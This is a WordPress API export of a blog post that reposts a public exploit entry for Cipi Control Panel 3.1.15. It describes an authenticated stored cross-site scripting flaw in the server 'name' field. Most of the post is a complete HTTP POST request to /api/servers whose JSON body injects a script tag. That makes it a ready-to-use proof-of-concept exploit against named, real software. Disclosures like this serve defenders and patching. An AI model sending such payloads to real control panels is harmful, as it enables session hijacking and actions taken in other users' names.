{"id":21126,"date":"2022-02-28T20:18:24","date_gmt":"2022-02-28T17:18:24","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166161\/cipicp3115-xss.txt"},"modified":"2022-03-02T12:32:32","modified_gmt":"2022-03-02T09:02:32","slug":"cipi-control-panel-3-1-15-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/cipi-control-panel-3-1-15-cross-site-scripting\/","title":{"rendered":"Cipi Control Panel 3.1.15 Cross Site Scripting"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Cipi Control Panel 3.1.15 &#8211; Stored Cross-Site Scripting (XSS) (Authenticated)<br \/>\n# Date: 24.02.2022<br \/>\n# Exploit Author: Fikrat Ghuliev (Ghuliev)<br \/>\n# Vendor Homepage: https:\/\/cipi.sh\/ &lt;https:\/\/www.aapanel.com\/&gt;<br \/>\n# Software Link: https:\/\/cipi.sh\/ &lt;https:\/\/www.aapanel.com\/&gt;<br \/>\n# Version: 3.1.15<br \/>\n# Tested on: Ubuntu<\/p>\n<p dir=\"ltr\">When the user wants to add a new server on the &#8220;Server&#8221; panel, in &#8220;name&#8221;<br \/>\nparameter has not had any filtration.<\/p>\n<p dir=\"ltr\">POST \/api\/servers HTTP\/1.1<br \/>\nHost: IP<br \/>\nContent-Length: 102<br \/>\nAccept: application\/json<br \/>\nX-Requested-With: XMLHttpRequest<br \/>\nAuthorization: Bearer<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36<br \/>\n(KHTML, like Gecko) Chrome\/98.0.4758.82 Safari\/537.36<br \/>\nContent-Type: application\/json<br \/>\nOrigin: http:\/\/IP<br \/>\nReferer: http:\/\/IP\/servers<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-US,en;q=0.9<br \/>\nConnection: close<\/p>\n<p dir=\"ltr\">{<br \/>\n&#8220;name&#8221;:&#8221;\\&#8221;&gt;&lt;script&gt;alert(1337)&lt;\/script&gt;&#8221;,<br \/>\n&#8220;ip&#8221;:&#8221;10.10.10.10&#8243;,<br \/>\n&#8220;provider&#8221;:&#8221;local&#8221;,<br \/>\n&#8220;location&#8221;:&#8221;xss test&#8221;<br \/>\n}<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Cipi Control Panel 3.1.15 &#8211; Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 24.02.2022 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https:\/\/cipi.sh\/ &lt;https:\/\/www.aapanel.com\/&gt; # Software Link: https:\/\/cipi.sh\/ &lt;https:\/\/www.aapanel.com\/&gt; # Version: 3.1.15 # Tested on: Ubuntu When the user wants to add a new server on the &#8220;Server&#8221; panel, in &#8220;name&#8221; parameter &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21126","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21126"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21126\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}